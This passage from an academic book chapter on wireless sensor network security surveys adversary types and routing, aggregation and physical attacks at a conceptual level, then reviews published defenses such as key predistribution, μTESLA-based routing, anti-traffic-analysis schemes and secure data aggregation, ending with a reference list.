To propose and develop efficient prevention and recovery mechanisms for attacks on wireless sensor networks it is important to know and understand the nature of the potential adversaries; these can be classified in two groups (Karlof & Wagner, 2003): mote class adversaries and laptop class adversaries. In the first case, the adversary has access to sensor nodes. In contrast, the laptop class adversary has access to more powerful devices such as personal computers, PDAs, and so forth. Thus, in this case, the devices have many advantages over legitimate nodes: a larger energy source, more powerful processors, and they could also have high-power transmitters or a highly sensitive antenna to eavesdrop on traffic.

A laptop class adversary can produce more damage than an adversary that only has access to a few sensor nodes. For instance, a sensor node can only block radio links in a small neighborhood, while an adversary with a laptop computer could block the entire sensor network with the help of a more powerful transmitter. Furthermore, a laptop class adversary could potentially eavesdrop on the traffic of the entire network, while a mote class adversary could only eavesdrop on the traffic in a very limited area.

Another commonly used adversary classification considers external and internal adversaries. Previously, we discussed external attacks, where the adversaries do not have any access to the sensor network. Conversely, internal attacks are those perpetrated by an authorized participant in the network that has turned malicious. Internal attacks can be mounted from compromised nodes that are executing malicious code or from laptop computers that have access to cryptographic materials, data, and code from authorized nodes.

Attacks on Routing Protocols

Most routing protocols for WSN are very simple; due to this simplicity, they are generally more vulnerable to attacks than their counterparts in ad hoc networks. Most attacks on network layer protocols fall into one of the following categories:

• Spoofed, altered, or replayed routing information. This attack is directed toward the routing information that is exchanged between nodes. By spoofing, altering, or replaying routing information, the adversaries could potentially create routing loops, attract or repel network traffic, lengthen or shorten routes, generate fake error messages, partition the network, increase node to node latency, and so forth.
• Selective forwarding. Multihop networks often operate assuming faithfully that messages will be received by their destination. In a selective forwarding attack, malicious nodes could refuse to forward certain messages or even discard them; consequently, these messages would not propagate through the network. A simple form of this attack is very easy to detect, because the neighbor nodes could easily infer that the route is no longer valid and use an alternate one. A more subtle form of this attack is when an adversary selectively forwards packets. Therefore, if an adversary is interested in suppressing or modifying packets that come from a certain source, the adversary could selectively forward the rest of the traffic, and thus the adversary would not raise any suspicion of the attack.
• Sinkhole attacks. In a sinkhole attack, the goal of the adversary is to attract all the traffic of a certain area of the network through a compromised node, creating a sinkhole (metaphorically speaking). Due to the fact that the nodes that are located along the route have the ability to alter application data, sinkhole attacks could facilitate other types of attacks (like selective forwarding, for instance).
• Sybil attacks. In a Sybil attack (Douceur, 2002), a node presents multiple identities to the rest of the nodes. Sybil attacks are a threat to geographical routing protocols, since they require the exchange of coordinates for effi-



cient packet routing. Ideally, we would expect that a node only sends a single set of coordinates, but under a Sybil attack, an adversary could pretend to be in many places at once.
• Wormhole attacks. In a wormhole attack (Hu, Perrig, & Johnson, 2002) an adversary builds a virtual tunnel through a low latency link that takes the messages from one part of the network and forwards them to another. The simplest case of this attack is when one node is located between two other nodes that are forwarding. However, wormhole attacks commonly involve two distant nodes that collude to underestimate the distance between them and forward packets through an external communication channel that is only available to the adversary.
• HELLO flood attacks. Some protocols require nodes to send HELLO packets to advertise themselves to their neighbors. If a node receives such a packet, it would assume that it is inside the RF range of the node that sent that packet. However, this assumption could be false, because a laptop class adversary could easily send these packets with enough power to convince all the network nodes that the adversary is their neighbor. Consequently, nodes close to the adversary may try to use the adversary as a route to the base station, while nodes further away would send packets directly to the adversary. But the transmission power of those nodes is much less than the adversary’s; thus, the packets would get lost, and that would create a state of confusion in the sensor network.
• Acknowledgement spoofing. Some routing algorithms require the use of acknowledgement signals (ACK). In this case, an adversary could spoof this signal in response to the packets that the adversary listens to. This results in convincing the transmitting node that a weak link is strong. Thus, an adversary could perform a selective forwarding attack after spoofing ACK signals to the node that the adversary intends to attack.

Attacks on Data Aggregation Techniques

Data aggregation in wireless sensor networks can significantly reduce communication overhead compared to all the nodes sending their data to the base station. However, data aggregation further complicates network security. This is due to the fact that every intermediate node could potentially modify, forge, or discard messages. Therefore, a single compromised node could be able to alter the final aggregation value. Intruder node and compromised node attacks are two major threats to security in sensor networks that use data aggregation techniques.

Physical Attacks

Sensor networks often operate in hostile environments. In those environments, the size of the nodes plus the unattended operation mode contribute to making them very vulnerable to physical attacks (i.e., node destruction) (Wang, Gu, Schosek, Chellappan, & Xuan, 2005c). In contrast to other types of attacks, physical attacks destroy the nodes permanently; thus, their loss is irreversible. For instance, an adversary could extract cryptographic keys, alter the node’s circuitry, and reprogram it or replace it with malicious nodes (Wang, Gu, Chellappan, Xuan, & Lai, 2005b). Previous work shows that a Berkeley MICA2 mote (one of the most commonly used in the research community) can be compromised in less than a minute. Even though these results are not surprising, because MICA2 motes do not have any physical protection mechanism, they give us a good idea of what a well-trained adversary can do.

Defense Countermeasures

In this section we will present some security mechanisms that have been proposed in the literature and that help in meeting the security requirements discussed earlier. For this purpose, we will begin by discussing the key establishment process in WSN, which is the base for security in this type of network. We will follow that with a


description of security mechanisms for preventing denial-of-service attacks, defense against routing protocol attacks, how to protect from traffic analysis attacks, defending against sensor node privacy attacks, and protection against physical and data aggregation attacks.

Key Establishment Process

One important aspect of security that has received a great deal of attention from the research community is the key establishment process in WSN. Due to the fact that encryption and key establishment are crucial elements in security defense mechanisms, and most security mechanisms rely on pure encryption, we will give a general overview on encryption before going into any details about specific security defense mechanisms.

Table 1. A summary of the analysis for cipher performance (Law et al., 2004)

By key setup

            Size optimized                         Speed optimized
Rank   Code mem.   Data mem.   Speed         Code mem.   Data mem.   Speed
1      RC5-32      MISTY1      MISTY1        RC6-32      MISTY1      MISTY1
2      KASUMI      Rijndael    Rijndael      KASUMI      Rijndael    Rijndael
3      RC6-32      KASUMI      KASUMI        RC5-32      KASUMI      KASUMI
4      MISTY1      RC6-32      Camellia      MISTY1      RC6-32      Camellia
5      Rijndael    RC5-32      RC5-32        Rijndael    Camellia    RC5-32
6      Camellia    Camellia    RC6-32        Camellia    RC5-32      RC6-32

By encryption mode

            Size optimized                         Speed optimized
Rank   Code mem.   Data mem.   Speed         Code mem.   Data mem.   Speed
1      RC5-32      RC5-32      Rijndael      RC6-32      RC5-32      Rijndael
2      RC6-32      MISTY1      MISTY1        RC5-32      MISTY1      Camellia
3      MISTY1      KASUMI      KASUMI        MISTY1      KASUMI      MISTY1
4      KASUMI      RC6-32      Camellia      KASUMI      RC6-32      RC5-32
5      Rijndael    Rijndael    RC6-32        Rijndael    Rijndael    KASUMI
6      Camellia    Camellia    RC5-32        Camellia    Camellia    RC6-32

Overview

The key establishment and key management problems are not exclusive to sensor networks. In fact, this type of problem has been thoroughly studied in the wireless network community. Traditionally, key establishment is performed through some public key protocol. The most commonly used is Diffie-Hellman (Diffie & Hellman, 1976), but there are many more.

However, most of the traditional techniques are not suitable for low-power devices such as sensor nodes. This is due to the fact that these techniques use asymmetric cryptography, which is also known as public key cryptography. In this case it is required to maintain two mathematically related keys, one of which is public while keeping the other private. The problem with public key cryptography in WSN

is that, computationally speaking, it is very heavy for the sensor nodes. However, there has been work that shows that implementation is viable if a proper selection of algorithms is made (Gaubatz, Kaps, & Sunar, 2004; Gura, Patel, Wander, Eberle, & Shantz, 2004; Malan, Welsh, & Smith, 2004; Watro, Kong, Fen Cuti, Gardiner, Lynn, & Kruus, 2004).

For these reasons, symmetric encryption is the more widely selected technique for applications that cannot handle the computational complexity of asymmetric encryption. Symmetric techniques use a single key that is shared by the two communicating parties. This key is used for data encryption and decryption. The traditional example of symmetric encryption is the DES (data encryption standard) algorithm. However, the use of DES has decreased significantly because it can be easily broken. Currently, other algorithms such as 3DES (triple DES), RC5, AES, and others are used instead (Schneier, 1996).

An analysis of several cipher algorithms (Law, Doumen, & Hartel, 2004) is summarized in Table 1, where two classifications are made: one by key setup and the other by encryption mode. In both classifications the algorithms were optimized for code size and for speed, and aspects such as speed, code size, and required data memory were evaluated.

A great challenge for symmetric encryption is the problem of key management. The problem resides in the fact that both parties need to know the key prior to starting secure communication. Thus, the problem can be summarized as follows: how can we assure that only the two communicating parties know the key and no one else does? Distributing secret keys is not an easy problem to solve because preinstalling the key in the sensor node is not always an option.

Key Establishment Protocols

There are several random key predistribution techniques that have been proposed. Eschenauer and Gligor (2002) propose a scheme based on probabilistic key sharing among sensor nodes. This scheme operates first by distributing a key chain to all participant nodes before their deployment. Each key chain consists of a set of keys that has been randomly selected from a larger offline-generated key set. To use the random key predistribution technique it is not necessary that each pair of nodes share a key. However, every pair of nodes that does share a key may use that key to establish a direct secure connection between them. Eschenauer and Gligor (2002) show that under this scheme it is highly probable that sensor nodes can operate with shared keys.

The LEAP protocol (Zhu, Setia, & Jajodia, 2003) adopts the approach of using multiple techniques for key establishment. Here, the authors make the observation that no single mechanism by itself provides security for every type of connection in wireless networks. Thus, in this work they present four different types of keys that are used depending on the communication type to be established.

In PIKE (Chan & Perrig, 2005), the authors describe a mechanism for establishing a key between two nodes based on the trust that both nodes have toward a third node in the same network. The shared keys of each node are propagated throughout the network in such a way that for every pair of nodes A and B a node C exists that shares a key with both A and B. Thus, the key establishment protocol between A and B can be securely routed through C.

Perrig et al. (2002) propose a key distribution scheme for secure broadcast authentication named μTESLA. The main idea of μTESLA is to achieve asymmetric cryptography through the delayed disclosure of symmetric keys.

It is important to point out that the most significant advances in the integration of public key cryptography into WSN (which will be discussed next) have been made recently. This makes random key predistribution a less interesting topic.

Public Key Cryptography

Two of the more commonly used public key cryptography algorithms are RSA and ECC (Schneier, 1996). Traditionally, it was thought that these techniques were way too complex for applying them to WSN. However, successful implementations of public key cryptographic systems in WSN have been published recently.

Gura et al. (2004) report that it is possible to implement RSA and ECC in 8-bit microprocessors, demonstrating a performance advantage of ECC over RSA. Another advantage is that the 160-bit

key in ECC generates shorter messages during transmission compared to the 1024-bit key of RSA. Particularly, this work demonstrates that the dot product operations used in ECC execute faster than the operations in RSA.

Watro et al. (2004) show that certain parts of the RSA cipher can be implemented on current sensor network platforms, particularly in the MICA2 Berkeley motes (Hill, Szewczyk, Woo, Hollar, Culler, & Pister, 2000). They implemented the public key operations in the sensor nodes while the private ones were performed in more powerful devices. In this case they used a laptop computer.

Malan et al. (2004) propose a scheme based on ECC and show an implementation of the Diffie-Hellman algorithm based on the elliptic curve discrete logarithm problem. While key generation is by no means fast (around 34 seconds for generating the pair of keys and another 34 seconds for generating the secret key), this probably would suffice for applications that do not require frequent key renewal.

Preventing Denial-of-Service Attacks

In Table 2 we show the most common denial of service attacks and their corresponding countermeasures classified by layers. Due to the fact that DoS attacks are very common, efficient countermeasure mechanisms are required. One approach to defend against the classic channel jamming attack is to identify the part of the network that is jammed and route traffic around that area. Wood and Stankovic (2002) describe a two-phase approach where nodes along the perimeter of the jammed area report their status to their neighbors, who then collaboratively define the jammed region and simply route around it.

To protect against jamming at the MAC layer, nodes could use an admission control mechanism that limits their transmission rate. This would allow the network to ignore the requests designed to exhaust the node's energy source. However, this is not an optimal solution because the network must be able to handle large volumes of traffic.

Protecting against malicious nodes that intentionally misroute traffic can be done at the cost of redundancy. In this case, a node can send the message through multiple routes, thus increasing the probability that the message will arrive at its final destination simply because the message does not rely on a single route to get there.

Table 2. Wireless sensor network DoS attacks/defenses

Layer               Attacks             Defenses
Physical            Jamming             Spread-spectrum, priority messaging, lower duty cycle, region mapping, mode change
                    Tampering           Tamper-proof, hiding
Link                Collision           Error correcting code
                    Exhaustion          Rate limitation
                    Unfairness          Small frames
Network (routing)   Neglect and greed   Redundancy, probing
                    Homing              Encryption
                    Misdirection        Egress filtering, authorization, monitoring
                    Black holes         Authorization, monitoring, redundancy
Transport           Flooding            Client puzzles
                    Desynchronization   Authentication

Defending Against Routing Protocol Attacks

Routing protocols for WSN have been a well studied topic to a certain extent. However, most of the research efforts focus mainly on providing energy
efficient routing mechanisms. There is a large demand for routing protocols that, besides offering energy efficiency, also offer security against certain network attacks such as sinkhole attacks, wormhole attacks, and the Sybil attack. As the range of WSN applications is increasing, as well as their network densities, secure routing will be a design factor that must be considered for future applications.

Security Techniques for Routing Protocols

Deng, Han, and Mishra (2002) introduce an intrusion tolerant routing protocol for sensor networks (INSENS). This protocol is based on minimizing the damage caused by an intruder and keeping routing working despite its presence, without having to identify the intruder. In this work, the authors state that an intruder does not necessarily have to be a malicious node; it very well could be a node that is just malfunctioning for physical reasons. Distinguishing a malicious node from a malfunctioning one could be extremely difficult. For this reason they make no distinction between them. The first technique that they propose is to mitigate the damage caused by a potential intruder by applying redundancy. This is, as we previously mentioned, sending a packet through multiple routes.

They also assume that there are large differences in available resources between the base station and the sensor nodes; thus, they propose that routing table computation is to be performed at the base station. This is done in three phases. In the first phase the base station broadcasts a request that propagates through the entire network. In the next phase, the base station collects information about node connectivity. Finally, the base station computes a series of routing tables for each node. These tables include redundant routing information used for the redundant message transmission we discussed earl ier.

There are several attacks that could be launched against the routing protocol during each one of the three phases. In the first phase, a node could spoof a request made by the base station. A malicious node could forward the request through a fake route or simply not forward the request made by the base station.

To avoid this, Deng et al. (2002) use a technique similar to μTESLA where one-way key chains are used to authenticate the message from the base station.

Tanachaiwiwat, Dave, Bhindwale, and Helmy (2003) introduce a novel technique that they called TRANS (trust routing for location aware networked sensors). This routing protocol was proposed for data-centric networks. It also uses delayed key disclosure to achieve asymmetric cryptography. In their implementation, they use μTESLA for message authentication and confidentiality. By using μTESLA, TRANS can be sure that a message follows a trusted route through location-based routing. The approach consists of the base station sending an encrypted broadcast message to its neighbors. Only those trusted neighbors would have the key required to decrypt that message. The trusted neighbors would add their location to the route (for returning messages), and would encrypt the message now with their own keys and send the message to the neighbor closest to the destination. When the message arrives at its destination, the receiving node must authenticate the source (in this case the base station) using a MAC that belongs to the base station. Afterwards, the node can simply send a message to the base station through the trusted route that the original message followed.

An important challenge in the area of secure routing for wireless networks is that it is very easy to disrupt the routing protocol by simply disrupting the route discovery process. Papadimitratos and Haas (2002) propose a secure route discovery protocol that guarantees, under certain conditions, that the correct network topology would be obtained. This protocol is very similar to TRANS. The security relies on the MAC layer and on an accumulation of the node identities that are included in the route. By doing this, a source node can discover the network topology because each node from the source to the destination appends its identity to the message. In order to ensure that the message has not been tampered with, a MAC code is also appended to the message, which can

be authenticated by either the destination or by the source (for returning messages).

How to Protect from Traffic Analysis Attacks

There are some strategies to protect from traffic analysis attacks. Deng, Han, and Mishra (2004) propose a technique based on a random walk through the network. This technique also sends packets randomly to nodes different from the parent node in the routing tree. The main goal of this technique is to make it harder for a potential adversary to infer the route from a given node to the base station and also to protect against a possible rate monitoring attack, but it would not protect against a time correlation attack. To protect against a time correlation attack, they propose a fractal strategy. With this technique a node would generate a fake packet (with certain probability) while one of its neighbors is sending a packet to the base station. The fake packet would be sent to another neighbor that consequently may send another fake packet, thus deceiving the potential adversary. These fake packets would use the time-to-live (TTL) parameter to decide for how long they would be circulating throughout the network.

Defending Against Sensor Node Privacy Attacks

To protect against privacy attacks, several proposals have been made that reduce the effects of those attacks; we will discuss some of those proposals in this section (Gruteser, Schelle, Jain, Han, & Grunwald, 2003).

Anonymity Mechanisms

When very precise location information is being used it is easy to identify the user and monitor the user's activity; thus, this opens the door for a privacy attack. The anonymity mechanisms depersonalize the data before releasing them; these techniques are an alternative approach to policy-based access control.

Some researchers have proposed certain techniques that make use of anonymity mechanisms. For instance, Gruteser and Grunwald (2003a) analyze the feasibility of anonymizing location information for location-based services in an automotive telematic environment. Beresford and Stajano (2003) evaluate anonymity techniques for an indoor location-based system based on the Active Bat.

Producing total anonymity is a difficult problem given the lack of knowledge about the location of the node in question. Therefore, for the privacy problem, there is a tradeoff between the required anonymity level and the need for public information. Three approaches have been proposed to address this problem (Gruteser & Grunwald, 2003b; Gruteser et al., 2003; Priyantha, Chakraborty, & Balakrishnan, 2000; Smailagic & Kogan, 2002):

• Decentralize sensitive data. The main idea in this approach is to distribute the sensed location data through a spanning tree. By doing so, no single node will contain the original data.

• Secure the communication channel. By using secure communication protocols such as SPINS (Perrig et al., 2002), eavesdropping and active attacks can be prevented.

• Node mobility. Making the nodes move can be an effective defense mechanism against privacy attacks, particularly due to the fact that location information would be changing constantly. For instance, the Cricket system (Priyantha et al., 2000) is a system with location support for mobile objects inside buildings.

Policy-Based Approach

The policy-based approach is a topic that is currently receiving a great deal of attention from the research community. Access control decisions and authentication are based on the specifications provided by the privacy policies. Molnar and Wagner (2004) introduce the concept of private authentication in RFID applications, which can be considered passive nodes. In the automotive

telematics domain, Duri, Gruteser, Liu, Moskowitz, Perez, Singh et al. (2002) propose a policy-based framework to protect data from the sensors, where an on-board computer can act as a trusted agent. Snekkenes (2001) presents advanced concepts for policy specification on cell phone networks. These concepts allow access control based on criteria such as request time, location, object speed, and identity. Myles, Friday, and Davies (2003) describe an architecture for a centralized server that controls the access of client applications through the use of validation modules that verify the XML-formatted application policies. Hengartner and Steenkiste (2003) point out that access control policies must be governed by room or user policies. The room policies specify who is authorized to find out about the people currently in the room, while user policies state who is permitted to access location information about another user.

Langheinrich (2005) proposed a framework called PawS (privacy awareness system). This framework is based on privacy policy advertisements through special packets called privacy beacons. Those policies are maintained with privacy proxies, which keep databases that store those policies.

Information Flooding

Ozturk, Zhang, Trappe, and Ott (2004) propose anti-traffic analysis mechanisms to prevent an external adversary from obtaining the location of a data source. Random data routing and phantom traffic are used to hide real traffic, so that it is difficult for an adversary to track the data source through traffic analysis. Ozturk et al. have developed comparable methods that rely on flooding-based routing protocols.

Some similar mechanisms can be used to prevent an adversary from tracking the base station through traffic analysis (Gura et al., 2004). A key problem with these techniques is that they involve an energy cost in order to provide information anonymity.

Protecting from Physical Attacks

Physical attacks, as we pointed out earlier, represent an important threat to sensor networks because of their unattended operation mode and their extremely limited resources. Nodes may be equipped with tamper-proof physical protection. For instance, an alternative to this is tamper-proof packaging (Wood & Stankovic, 2002). Related research work focuses on the design of hardware that makes its memory content inaccessible to adversaries. Another alternative is to use special software and hardware to detect physical tampering.

As hardware costs decrease, integrating tamper-proof hardware would be a feasible solution for sensor network applications. However, the research community has agreed by consensus that the trend should be making cheaper sensor nodes without adding extra functionalities; thus, integrating physical protection is not a solution that would be commonly accepted in the near future. One possible approach for protecting against physical attacks is self-destruction. The main idea behind this approach is that whenever a node detects a possible attack it self-destructs. This is particularly feasible on networks where there are redundant nodes and when the cost per node is low. Obviously, the key to this approach is detecting a possible attack. One possible solution is to statically verify the status of their neighbors, but in mobile networks this is still an open problem.

Regarding the deployment of security components outside the nodes, several proposals have been made (Bulusu & Jha, 2005). Sastry, Shankar, and Wagner (2003) introduce the concept of secure location verification and propose a secure localization scheme called ECHO that assures node location legitimacy. In this scheme, the security relies on the physical properties of sound and RF. The adversary cannot claim to have a shorter distance by starting the ultrasound response early because it will not have the nonce.

Hu and Evans (2004) use directional antennas to defend against wormhole attacks. In the work presented by Wang et al. (2005b) the authors study the modeling and defense of sensor networks against search-based physical attacks. They define a physical attack-based model, where an adversary walks the network using signal detecting equipment to locate active nodes and destroy them. In prior work, the authors identified and modeled blind physical attacks (Wang, Gu, Chellappan,

Schosek, & Xuan, 2005a). The defense algorithm is executed by individual nodes in two phases: in the first phase, the nodes detect the attacker and notify other nodes; in the second phase, the nodes receive the notification and change their state to safe mode.

Seshadri, Perrig, Van Doorn, and Khosla (2004) introduce a mechanism called SWATT to verify and detect when memory content is altered. This mechanism can be used as a defense against a physical attack that modifies the code in the nodes.

Secure Data Aggregation

As sensor networks increase in size, the amount of data that they collectively sense also increases. However, due to the computational limitations of each node, a small sensor is only responsible for a very small portion of the entire data. Due to this, a network search would probably return a large amount of raw data, most of which would not be of the user's interest.

For this reason, raw data preprocessing is recommended to produce more meaningful results to the user. This is typically done by a series of aggregators. An aggregator is responsible for collecting raw data from a subset of nodes and processing that raw data into more usable data.

However, aggregation techniques are particularly vulnerable to attacks because a single aggregator node is responsible for processing the data from multiple nodes. Due to this fact, secure data aggregation techniques are required by sensor networks that consider the possibility of one or more malicious nodes.

Overview

If an aggregator node is compromised, then all the data transmitted in the network to the base station may be forged. To detect this, Ye, Luo, Lu, and Zhang (2005) define a mechanism based on statistical filters. This uses multiple MAC codes across the entire route from the aggregator node to the base station. Any packet that does not pass verification would be discarded.

Wagner (2004) analyzes the resiliency of aggregation techniques, and argues that current aggregation techniques were proposed without security in mind, and thus are vulnerable to attacks. A mathematical framework is proposed to formally evaluate security for aggregation. This theory allows quantifying the robustness of an aggregation operation against a malicious attack. By using the framework, it is argued that the aggregation functionalities that can be securely computed in the presence of k compromised nodes are exactly the functions that are (k, K)-resilient for some K that is not too large. This work opened the door for secure data aggregation in sensor networks. However, the presented aggregation model is fairly simple compared to real sensor network implementations. Extending this technique to multilevel aggregation scenarios with heterogeneous devices is an interesting challenge.

Secure Data Aggregation Techniques

As we pointed out earlier, data aggregation has been studied in reasonable depth. The problem with classical data aggregation techniques is that they all assume trusted nodes. Of course, in practice this may not be the case, and for this reason, secure data aggregation techniques are required.

Przydatek, Song, and Perrig (2003) describe secure information aggregation (SIA). They point out that aggregation techniques and sensor networks are vulnerable to a variety of attacks including denial-of-service attacks. However, this work focuses on protecting against a specific type of attack called stealthy attack. The goal of SIA is to ensure that if a user accepts the result of an aggregation as correct, then there is a high probability that the value is close to the true aggregation value. In case the aggregated value has been tampered with, the user must reject the forged value with a high probability.

Hu and Evans (2003) propose a secure aggregation technique that uses the μTESLA protocol to provide security. In this case, the nodes organize into a hierarchy tree where intermediate nodes play the aggregator role. Recall that μTESLA achieves asymmetry through delayed disclosure of symmetric keys. For this reason, a child cannot verify the data authenticity immediately because the key used to generate the MAC code has not been disclosed.


However, the Hu and Evans (2003) technique does not guarantee that the data being reported by the nodes and the aggregator are correct. To address this problem, the base station is responsible for distributing temporary keys to the network as well as the μTESLA key used for validating the MAC. By using this key, nodes can verify their children's MAC codes.

We can note that secure data aggregation techniques play an important role in adopting WSN technology due to the large amount of raw data and the localized in-network processing required in these networks. Research efforts in this area have been limited; thus, much more investigation is needed in this particular topic.

Conclusion

Certainly, incorporating efficient security mechanisms into WSN is a huge challenge, mainly because of the differences they have compared to traditional networks. Their resource constraints and their large scale deployments, along with their operating environments, represent great obstacles to achieving security. Nevertheless, efficient mechanisms have been proposed to deal with the great variety of attacks to which WSN are presumably subjected. These security techniques confront specific attacks that operate across different layers of the protocol stack. Attacks like signal jamming (physical layer), induced collisions (MAC sublayer), packet redirection (routing layer), and many others have been addressed through many security mechanisms, many of which we described in this chapter.

However, most of the security techniques rely heavily on a key distribution protocol and assume that secret keys have already been placed on the distributed nodes. As we showed in this chapter, efficient key distribution in WSN is no easy task. In fact, most of the research efforts in WSN security are directed to proposing efficient key distribution techniques; in this chapter we discussed research work in the area of WSN key distribution. As of now, we still believe that there is much room for improvement in efficient key distribution in wireless sensor networks. As more efficient key distribution mechanisms continue to appear, more efficient application-specific security techniques will also emerge.

But overall, perhaps the biggest challenge of all is proving that the proposed security techniques work well in real-world sensor network applications. Currently, there is a huge gap between real-world WSN development and WSN security research. Thus, we consider that integrating the proposed security techniques into real-world applications is a challenge that should be faced in the near future, as opposed to proposing new techniques that most of the time do not go beyond lab implementations.

References

Akyildiz, I., Su, W., Sankarasubramaniam, Y., & Cayirci, E. (2002). A survey on sensor networks. IEEE Communications Magazine, 40(8), 102-114.

Anderson, R. J., & Kuhn, M. G. (1996, November). Tamper resistance: A cautionary note. Paper presented at the Second USENIX Workshop on Electronic Commerce, Oakland, CA.

Anderson, R. J., & Kuhn, M. G. (1997). Low cost attacks on tamper resistant devices. In B. Christianson, B. Crispo, T. M. A. Lomas, & M. Roe (Eds.), Security Protocols Workshop (LNCS 1361, pp. 125-136). Springer.

Beresford, A., & Stajano, F. (2003). Location privacy in pervasive computing. IEEE Pervasive Computing, 2(1), 46-55.

Bulusu, N., & Jha, S. (2005). Wireless sensor networks: A system perspective. Artech House.

Carman, D. W., Kruus, P. S., & Matt, B. J. (2000). Constraints and approaches for distributed sensor network security (Tech. Rep. No. 00-010). NAI Labs, The Security Research Division.

Chan, H., & Perrig, A. (2005, March). PIKE: Peer intermediaries for key establishment in sensor networks. Paper presented at IEEE INFOCOM, Miami.
Security in Wireless Sensor Networks

Chan, H., Perrig, A., & Song, D. X. (2003, May). Random key predistribution schemes for sensor networks. Paper presented at the IEEE Symposium on Security and Privacy, Oakland, CA.

Deng, J., Han, R., & Mishra, S. (2002). INSENS: Intrusion-tolerant routing in wireless sensor networks (Tech. Rep. No. CU-CS-939-02). University of Colorado, Department of Computer Science.

Deng, J., Han, R., & Mishra, S. (2004). Countermeasures against traffic analysis in wireless sensor networks (Tech. Rep. No. CU-CS-987-04). University of Colorado, Department of Computer Science.

Diffie, W., & Hellman, M. E. (1976). New directions in cryptography. IEEE Transactions on Information Theory, 22(6), 644-654.

Douceur, J. R. (2002). The Sybil attack. In P. Druschel, M. F. Kaashoek, & A. I. T. Rowstron (Eds.), IPTPS (LNCS 2429, pp. 251-260). Springer.

Du, W., Deng, J., Han, Y. S., & Varshney, P. K. (2003). A pairwise key pre-distribution scheme for wireless sensor networks. In Jajodia (pp. 42-51).

Duri, S., Gruteser, M., Liu, X., Moskowitz, P., Perez, R., Singh, M., et al. (2002). Framework for security and privacy in automotive telematics. In Proceedings of the 2nd International Workshop on Mobile Commerce (WMC '02), New York (pp. 25-32). ACM Press.

Eschenauer, L., & Gligor, V. D. (2002). A key-management scheme for distributed sensor networks. In V. Atluri (Ed.), ACM Conference on Computer and Communications Security (pp. 41-47).

Estrin, D., Govindan, R., Heidemann, J. S., & Kumar, S. (1999). Next century challenges: Scalable coordination in sensor networks. In Proceedings of the MOBICOM (pp. 263-270).

Gaubatz, G., Kaps, J.-P., & Sunar, B. (2004). Public key cryptography in sensor networks: Revisited. In C. Castelluccia, H. Hartenstein, C. Paar, & D. Westhoff (Eds.), ESAS (LNCS 3313, pp. 2-18). Springer.

Gruteser, M., & Grunwald, D. (2003a). Anonymous usage of location-based services through spatial and temporal cloaking. In Proceedings of the USENIX MobiSys.

Gruteser, M., Schelle, G., Jain, A., Han, R., & Grunwald, D. (2003). Privacy-aware location sensor networks. In M. B. Jones (Ed.), USENIX HotOS (pp. 163-168).

Gura, N., Patel, A., Wander, A., Eberle, H., & Shantz, S. C. (2004). Comparing elliptic curve cryptography and RSA on 8-bit CPUs. In M. Joye & J.-J. Quisquater (Eds.), CHES (LNCS 3156, pp. 119-132). Springer.

Hartung, C., Balasalle, J., & Han, R. (2005). Node compromise in sensor networks: The need for secure systems (Tech. Rep. No. CU-CS-990-05). University of Colorado, Department of Computer Science.

Hengartner, U., & Steenkiste, P. (2003). Protecting access to people location information. In Hutter (pp. 25-38).

Hill, J., Szewczyk, R., Woo, A., Hollar, S., Culler, D. E., & Pister, K. S. J. (2000). System architecture directions for networked sensors. In Proceedings of the 9th International Conference on Architectural Support for Programming Languages and Operating Systems (pp. 93-104).

Hu, L., & Evans, D. (2003). Secure aggregation for wireless networks. Paper presented at the SAINT Workshops, IEEE Computer Society (pp. 384-394).

Hu, L., & Evans, D. (2004). Using directional antennas to prevent wormhole attacks. Paper presented at the NDSS. The Internet Society.

Hu, Y.-C., Perrig, A., & Johnson, D. B. (2002). Wormhole detection in wireless ad hoc networks (Tech. Rep. No. TR01-384). Rice University, Department of Computer Science.

Karlof, C., & Wagner, D. (2003). Secure routing in wireless sensor networks: Attacks and countermeasures. Ad Hoc Networks, 1(2-3), 293-315.

Karp, B., & Kung, H. T. (2000). GPSR: Greedy perimeter stateless routing for wireless networks. Paper presented at the MOBICOM (pp. 243-254).

Langheinrich, M. (2005). Personal privacy in ubiquitous computing: Tools and system support. Unpublished doctoral dissertation, Swiss Federal Institute of Technology Zurich.

Law, Y. W., Doumen, J., & Hartel, P. (2004). Survey and benchmark of block ciphers for wireless sensor networks (Tech. Rep. No. TR-CTIT-04-07). Faculty of Electrical Engineering, Mathematics and Computer Science, University of Twente, The Netherlands.

Madden, S., Franklin, M. J., Hellerstein, J. M., & Hong, W. (2002). TAG: A tiny aggregation service for ad-hoc sensor networks. SIGOPS Oper. Syst. Rev., 36(SI), 131-146.

Malan, D. J., Welsh, M., & Smith, M. D. (2004). A public-key infrastructure for key distribution in TinyOS based on elliptic curve cryptography. Paper presented at the SECON (pp. 71-80).

Molnar, D., & Wagner, D. (2004). Privacy and security in library RFID: Issues, practices, and architectures. In V. Atluri, B. Pfitzmann, & P. D. McDaniel (Eds.), ACM Conference on Computer and Communications Security (pp. 210-219).

Myles, G., Friday, A., & Davies, N. (2003). Preserving privacy in environments with location-based applications. IEEE Pervasive Computing, 2(1), 56-64.

Ozturk, C., Zhang, Y., Trappe, W., & Ott, M. (2004). Source-location privacy for networks of energy-constrained sensors. Paper presented at the WSTFEUS (pp. 68-81). IEEE Computer Society.

Papadimitratos, P., & Haas, Z. (2002). Secure routing for mobile ad hoc networks. In Proceedings of SCS Communication Networks and Distributed System Modeling and Simulation Conference, CNDS '04.

Perrig, A., Stankovic, J. A., & Wagner, D. (2004). Security in wireless sensor networks. Communications of the ACM, 47(6), 53-57.

Perrig, A., Szewczyk, R., Tygar, J. D., Wen, V., & Culler, D. E. (2002). SPINS: Security protocols for sensor networks. Wireless Networks, 8(5), 521-534.

Pietro, R. D., Mancini, L. V., Law, Y. W., Etalle, S., & Havinga, P. J. M. (2003). LKHW: A directed diffusion-based secure multicast scheme for wireless sensor networks. Paper presented at the ICPP Workshops. IEEE Computer Society.

Priyantha, N. B., Chakraborty, A., & Balakrishnan, H. (2000). The Cricket location support system. Paper presented at the MOBICOM (pp. 32-43).

Przydatek, B., Song, D. X., & Perrig, A. (2003). SIA: Secure information aggregation in sensor networks. In I. F. Akyildiz, D. Estrin, D. E. Culler, & M. B. Srivastava (Eds.), SenSys (pp. 255-265). ACM.

Sastry, N., Shankar, U., & Wagner, D. (2003). Secure verification of location claims. In Proceedings of the 2003 ACM Workshop on Wireless Security, WiSe '03, New York (pp. 1-10). ACM Press.

Schneier, B. (1996). Applied cryptography: Protocols, algorithms, and source code in C (2nd ed.). John Wiley.

